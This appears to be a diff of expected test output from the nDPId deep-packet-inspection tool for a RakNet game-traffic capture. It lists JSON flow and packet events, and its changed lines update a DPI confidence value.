AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"raknet.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":946713048272,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":946713048272,"pkt":"YDjgxTWgeJS0JASgCABFAAA45d9AADgR4WKUmSPNwKgCZOp1gLcAJA72BgD\/\/wD+\/v7+\/f39\/RI0VngABZGlNgURqAAF1A=="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"raknet.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":946713048274,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":946713048274,"pkt":"eJS0JASgYDjgxTWgCABFAAA+UW1AAD8Rbs\/AqAJklJkjzYC36nUAKuu4BwD\/\/wD+\/v7+\/f39\/RI0VngEa2bcMup1AkAAAAAASQ8CfA=="} -00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"raknet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946713048252,"flow_last_seen":946713048274,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1526,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":946713048274,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32951,"dst_port":60021,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00642{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":33,"source":"raknet.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946713048252,"flow_last_seen":946713048274,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1526,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":946713048274,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32951,"dst_port":60021,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"raknet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048361,"flow_last_seen":946713048361,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":946713048361,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60022,"dst_port":32951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"raknet.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":946713048361,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":32,"thread_ts_msec":946713048361,"pkt":"YDjgxTWgeJS0JASgCABFAAA05hNAADgR4TKUmSPNwKgCZOp2gLcAIAIbhAIAAAAAiAMAAAAAABXpXgAAABMMIBVGAACIAwAAAAAAFeleAAAAEwwgFUYAAIgDAAAAAAAV6V4AAAATDCAVRg=="} 
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"raknet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048361,"flow_last_seen":946713048361,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":946713048361,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60022,"dst_port":32951,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":46,"source":"raknet.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048361,"flow_last_seen":946713048361,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":24,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":946713048361,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60022,"dst_port":32951,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"raknet.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":946713048363,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":32,"thread_ts_msec":946713048363,"pkt":"YDjgxTWgeJS0JASgCABFAAA05hNAADgR4TKUmSPNwKgCZOp2gLcAIAIbhAIAAAAAiAMAAAAAABXpXgAAABMMIBVGAACIAwAAAAAAFeleAAAAEwwgFUYAAIgDAAAAAAAV6V4AAAATDCAVRg=="} 
00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":48,"source":"raknet.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":946713048365,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":106,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":106,"pkt_l4_len":32,"thread_ts_msec":946713048365,"pkt":"YDjgxTWgeJS0JASgCABFAAA05hNAADgR4TKUmSPNwKgCZOp2gLcAIAIbhAIAAAAAiAMAAAAAABXpXgAAABMMIBVGAACIAwAAAAAAFeleAAAAEwwgFUYAAIgDAAAAAAAV6V4AAAATDCAVRg=="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":49,"source":"raknet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048389,"flow_last_seen":946713048389,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":34,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":946713048389,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32952,"dst_port":60021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":49,"source":"raknet.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":946713048389,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":946713048389,"pkt":"eJS0JASgYDjgxTWgCABFAAA+UW1AAD8Rbs\/AqAJklJkjzYC46nUAKuu4BwD\/\/wD+\/v7+\/f39\/RI0VngEa2bcMup1AkAAAAAASQ8CfA=="} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"raknet.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":946713048391,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":946713048391,"pkt":"eJS0JASgYDjgxTWgCABFAAA+UW1AAD8Rbs\/AqAJklJkjzYC46nUAKuu4BwD\/\/wD+\/v7+\/f39\/RI0VngEa2bcMup1AkAAAAAASQ8CfA=="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":51,"source":"raknet.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":946713048392,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":76,"pkt_l4_len":42,"thread_ts_msec":946713048392,"pkt":"eJS0JASgYDjgxTWgCABFAAA+UW1AAD8Rbs\/AqAJklJkjzYC46nUAKuu4BwD\/\/wD+\/v7+\/f39\/RI0VngEa2bcMup1AkAAAAAASQ8CfA=="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"raknet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946713048389,"flow_last_seen":946713048392,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":946713048392,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32952,"dst_port":60021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 
+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":51,"source":"raknet.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946713048389,"flow_last_seen":946713048392,"flow_idle_time":200000,"flow_min_l4_payload_len":34,"flow_max_l4_payload_len":34,"flow_tot_l4_payload_len":102,"flow_avg_l4_payload_len":34,"midstream":0,"thread_ts_msec":946713048392,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32952,"dst_port":60021,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":52,"source":"raknet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048402,"flow_last_seen":946713048402,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":35,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":946713048402,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60025,"dst_port":32951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":52,"source":"raknet.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":946713048402,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":946713048402,"pkt":"YDjgxTWgeJS0JASgCABFAAA\/5elAADgR4VGUmSPNwKgCZOp5gLcAK28ACAD\/\/wD+\/v7+\/f39\/RI0VngABZGlNgURqASlRXt6gLcCQAA="} 
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"raknet.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":946713048410,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":946713048410,"pkt":"YDjgxTWgeJS0JASgCABFAAA\/5elAADgR4VGUmSPNwKgCZOp5gLcAK28ACAD\/\/wD+\/v7+\/f39\/RI0VngABZGlNgURqASlRXt6gLcCQAA="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"raknet.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":946713048422,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":77,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":77,"pkt_l4_len":43,"thread_ts_msec":946713048422,"pkt":"YDjgxTWgeJS0JASgCABFAAA\/5elAADgR4VGUmSPNwKgCZOp5gLcAK28ACAD\/\/wD+\/v7+\/f39\/RI0VngABZGlNgURqASlRXt6gLcCQAA="} -00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"raknet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946713048402,"flow_last_seen":946713048422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":946713048422,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60025,"dst_port":32951,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 
+00638{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":54,"source":"raknet.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":946713048402,"flow_last_seen":946713048422,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":35,"flow_tot_l4_payload_len":105,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":946713048422,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60025,"dst_port":32951,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":55,"source":"raknet.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048554,"flow_last_seen":946713048554,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":946713048554,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32953,"dst_port":60021,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"raknet.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":946713048554,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":946713048554,"pkt":"eJS0JASgYDjgxTWgCABFAAA4UXJAAD8RbtDAqAJklJkjzYC56nUAJN\/PhAAAAEAAkAAAAAkAAAAASQ8CfAAAAAAAFek7AA=="} 
-00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"raknet.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048554,"flow_last_seen":946713048554,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":946713048554,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32953,"dst_port":60021,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":55,"source":"raknet.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048554,"flow_last_seen":946713048554,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":946713048554,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":32953,"dst_port":60021,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"raknet.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":946713048585,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":946713048585,"pkt":"eJS0JASgYDjgxTWgCABFAAA4UXJAAD8RbtDAqAJklJkjzYC56nUAJN\/PhAAAAEAAkAAAAAkAAAAASQ8CfAAAAAAAFek7AA=="} 
00470{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":57,"source":"raknet.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":946713048601,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":946713048601,"pkt":"eJS0JASgYDjgxTWgCABFAAA4UXJAAD8RbtDAqAJklJkjzYC56nUAJN\/PhAAAAEAAkAAAAAkAAAAASQ8CfAAAAAAAFek7AA=="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":58,"source":"raknet.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048606,"flow_last_seen":946713048606,"flow_idle_time":200000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":946713048606,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":60690,"dst_port":60028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00637{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":58,"source":"raknet.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":946713048606,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":162,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":162,"pkt_l4_len":128,"thread_ts_msec":946713048606,"pkt":"eJS0JASgYDjgxTWgCABFAACUsVZAAD8RDpDAqAJklJkjze0S6nwAgCFnhAEAAGAC8AEAAAAAAAATBGtm3DLqfASA\/\/\/+7REE\/\/\/\/\/wAABP\/\/\/\/8AAAT\/\/\/\/\/AAAE\/\/\/\/\/wAABP\/\/\/\/8AAAT\/\/\/\/\/AAAE\/\/\/\/\/wAABP\/\/\/\/8AAAT\/\/\/\/\/AAAAAAATDAsawQAAAAAAAO8BAABIAAAAAAAAAO8B"} 
-00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"raknet.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048606,"flow_last_seen":946713048606,"flow_idle_time":200000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":946713048606,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":60690,"dst_port":60028,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00641{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":58,"source":"raknet.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048606,"flow_last_seen":946713048606,"flow_idle_time":200000,"flow_min_l4_payload_len":120,"flow_max_l4_payload_len":120,"flow_tot_l4_payload_len":120,"flow_avg_l4_payload_len":120,"midstream":0,"thread_ts_msec":946713048606,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":60690,"dst_port":60028,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":59,"source":"raknet.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048610,"flow_last_seen":946713048610,"flow_idle_time":200000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":946713048610,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60005,"dst_port":32951,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":59,"source":"raknet.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":946713048610,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":18,"thread_ts_msec":946713048610,"pkt":"YDjgxTWgeJS0JASgCABFAAAm5hVAADgR4T6UmSPNwKgCZOplgLcAElcnwAABAAEAAAIAAAAAAAAAAAAA"} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"raknet.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048610,"flow_last_seen":946713048610,"flow_idle_time":200000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":946713048610,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60005,"dst_port":32951,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":59,"source":"raknet.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946713048610,"flow_last_seen":946713048610,"flow_idle_time":200000,"flow_min_l4_payload_len":10,"flow_max_l4_payload_len":10,"flow_tot_l4_payload_len":10,"flow_avg_l4_payload_len":10,"midstream":0,"thread_ts_msec":946713048610,"l3_proto":"ip4","src_ip":"148.153.35.205","dst_ip":"192.168.2.100","src_port":60005,"dst_port":32951,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 
00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":60,"source":"raknet.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":946713048622,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":18,"thread_ts_msec":946713048622,"pkt":"YDjgxTWgeJS0JASgCABFAAAm5hVAADgR4T6UmSPNwKgCZOplgLcAElcnwAABAAEAAAIAAAAAAAAAAAAA"} 00453{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":61,"source":"raknet.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":946713048623,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":18,"thread_ts_msec":946713048623,"pkt":"YDjgxTWgeJS0JASgCABFAAAm5hVAADgR4T6UmSPNwKgCZOplgLcAElcnwAABAAEAAAIAAAAAAAAAAAAA"} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":62,"source":"raknet.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946711673443,"flow_last_seen":946711673573,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1953,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":946713048623,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":60689,"dst_port":60028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 
-00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":62,"source":"raknet.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946711624286,"flow_last_seen":946711624425,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1953,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":946713048623,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":44501,"dst_port":60030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":62,"source":"raknet.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":946711673443,"flow_last_seen":946711673573,"flow_idle_time":200000,"flow_min_l4_payload_len":7,"flow_max_l4_payload_len":1464,"flow_tot_l4_payload_len":1953,"flow_avg_l4_payload_len":130,"midstream":0,"thread_ts_msec":946713048623,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"148.153.35.205","src_port":60689,"dst_port":60028,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RakNet","breed":"Acceptable","category":"Game"}} 